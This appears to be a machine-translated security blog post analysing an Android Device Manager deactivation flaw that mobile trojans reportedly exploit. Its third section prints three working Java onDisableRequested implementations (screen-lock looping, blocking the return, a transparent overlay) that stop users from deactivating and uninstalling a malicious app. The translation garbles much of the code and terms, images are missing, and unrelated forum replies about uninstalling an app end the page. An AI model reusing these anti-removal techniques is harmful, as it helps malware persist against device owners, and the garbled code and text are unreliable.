Android Device Manager Vulnerability 2: prevents users from activating the Device Manager, android2 --

Android Device Manager Vulnerability 2: prevents users from activating the Device Manager, android2 --

In June 2013, Russian security vendor Kaspersky found the most powerful mobile trojan in history-Obad. a. This Trojan exploits an unknown Android Device Manager Vulnerability (ANDROID-9067882). A mobile phone trojan that has activated the permission of the Device Manager exploits this vulnerability, you can hide the settings in the Device Manager List of the setup program. In this way, you cannot cancel the permission of the Device Manager of the mobile Trojan through the normal channel, so that the Device Manager cannot be detached. Android and later versions have fixed this vulnerability. (Vulnerability details: http://blog.csdn.net/androidsecurity/article/details/9124747)

A few days ago, Baidu security lab found that mobile Trojans began to exploit another Android Device Manager Vulnerability. The New Device Manager Vulnerability was caused by a design defect in the Android system's process of canceling the activation of the Device Manager, with this design defect, malware can prevent users from canceling the activation of the Device Manager for reverse uninstallation. This vulnerability exists in all Android versions.

1. Cancel the Device Manager source code analysis

The source code of the process for canceling activation of the Device Manager for Android:

 

 

Basic flowchart for canceling activation of the Device Manager for Android:

 

1. ActivityManagerNative. getDefault (). stopjavaswitch () method

Why is this function called in the first step? The source code comment shows that the purpose of calling this function is to prevent other programs from popping up the Dialog during the user's cancellation of the Device Manager operation, which affects user operations.

Shows the source code of stopjavaswitch:

 

The Code shows that the specific implementation of this method is:

Activity switching is prohibited within APP_SWITCH_DELAY_TIME. After this method is called, all application Activity call requests will be put in the pending request queue by the system. The pending Activity call request will be executed by the system only after the APP_SWITCH_DELAY_TIME time.

 

By calling the stopjavaswitch () method, the system ensures that Activity switching is not performed within five seconds after the Device Manager is canceled.

 

Ii. Vulnerability Principle Analysis

Through the above process, we found that the device manager calls

Before DevicePolicyManagerService. removeActiveAdmin () cancels the activation of the Device Manager, DevicePolicyManagerService calls the onDisableRequested method of the application to obtain the alarm information for canceling the activation. If the content returned by the onDisableRequested function is null, step 1 is automatically executed. If the content returned by the onDisableRequested function cannot be blank, a prompt message is displayed for the Dialog function, prompting you to cancel the activation. You can click OK to perform step 2.

How can we prevent the process from being executed to Step 1?

OnDisableRequested is the only function called before step 1 of the process. To prevent the process from going to step 1, The onDisableRequested function meets the following conditions:

1. The returned content cannot be blank so that the Device Manager prompts the disable activation Device Manager warning information Dialog.

2. The Device Manager's pop-up warning message Dialog disappears through Activity switching. Make the user unable to operate the Dialog.

If the above two points are met, the program can successfully prevent the user from unactivating the Device Manager.

 

Iii. Vulnerability exploitation methods

The following three methods can be used to prevent the user from canceling the Device Manager.

1. screen lock

[Java]View plaincopy

1. @ Override
2. Public CharSequence onDisableRequested (Context context, Intent intent ){
3. // TODO Auto-generated method stub
4. Intent intent1 = context. getPackageManager (). getLaunchIntentForPackage ("com. android. settings ");
5. Intent1.setFlags (Intent. FLAG_ACTIVITY_NEW_TASK );
6. Context. startActivity (intent1 );
7. Final DevicePolicyManager dpm = (DevicePolicyManager) context. getSystemService (Context. DEVICE_POLICY_SERVICE );
8. Dpm. lockNow ();
9. New Thread (new Runnable (){
10. @ Override
11. Public void run (){
12. Int I = 0;
13. While (I <70 ){
14. Dpm. lockNow ();
15. Try {
16. Thread. sleep (100 );
17. I ++;
18. } Catch (InterruptedException e ){
19. E. printStackTrace ();
20. }
21. }
22. }
23. }). Start ();
24. Return "This is a onDisableRequested response message ";
25. }

 

2. Blocking function return

 

[Java]View plaincopy

1. @ Override
2. Public CharSequence onDisableRequested (Context context, Intent intent ){
3. // TODO Auto-generated method stub
4. Intent intent1 = context. getPackageManager (). getLaunchIntentForPackage ("com. android. settings ");
5. Intent1.setFlags (Intent. FLAG_ACTIVITY_NEW_TASK );
6. Context. startActivity (intent1 );
7. Try {
8. Thread. sleep (7000 );
9. } Catch (InterruptedException e ){
10. E. printStackTrace ();
11. }
12. Return "This is a onDisableRequested response message ";
13. }

3. transparent window hijacking

[Java]View plaincopy

1. @ Override
2. Public CharSequence onDisableRequested (Context context, Intent intent ){
3. // TODO Auto-generated method stub
4. Intent intent1 = context. getPackageManager (). getLaunchIntentForPackage ("com. android. settings ");
5. Intent1.setFlags (Intent. FLAG_ACTIVITY_NEW_TASK );
6. Context. startActivity (intent1 );
7. WindowManager. LayoutParams wmParams;
8. Final WindowManager mWindowManager;
9. WmParams = new WindowManager. LayoutParams ();
10. MWindowManager = (WindowManager) context. getSystemService (Context. WINDOW_SERVICE );
11. WmParams. type = WindowManager. LayoutParams. TYPE_SYSTEM_ALERT;
12. WmParams. format = PixelFormat. RGBX_8888;
13. WmParams. flags = WindowManager. LayoutParams. FLAG_NOT_FOCUSABLE;
14. WmParams. gravity = Gravity. LEFT | Gravity. TOP;
15. WmParams. alpha = 0;
16. WmParams. x = 0;
17. WmParams. y = 0;
18. WmParams. width = WindowManager. LayoutParams. MATCH_PARENT;
19. WmParams. height = WindowManager. LayoutParams. MATCH_PARENT;
20. Final View contentView = new Button (context );
21. MWindowManager. addView (contentView, wmParams );
22. New Thread (new Runnable (){
23. @ Override
24. Public void run (){
25. Try {
26. Thread. sleep (7000 );
27. } Catch (InterruptedException e ){
28. // TODO Auto-generated catch block
29. E. printStackTrace ();
30. }
31. MWindowManager. removeView (contentView );
32. }
33. }). Start ();
34. Return "This is a onDisableRequested response message ";
35. }

The above methods are all in onDisableRequested, and different methods are used to make the user unable to operate the interface within 5 seconds. Because the Activity switching request will be executed by the system after 5 seconds.

The mobile phone shows that the software can be uninstalled only after being deactivated in the Device Manager.

Set --- security --- Device Manager ----, and remove the software you want to uninstall. This will cancel the activation and you can uninstall it.
 
I want to uninstall the Mobile Phone Manager System settings-security-Device Manager Cancel activation of my mobile phone I5508 Samsung, I do not know where to find device management

Directly set application management, find the Mobile Phone Manager, and uninstall it.
I used i5508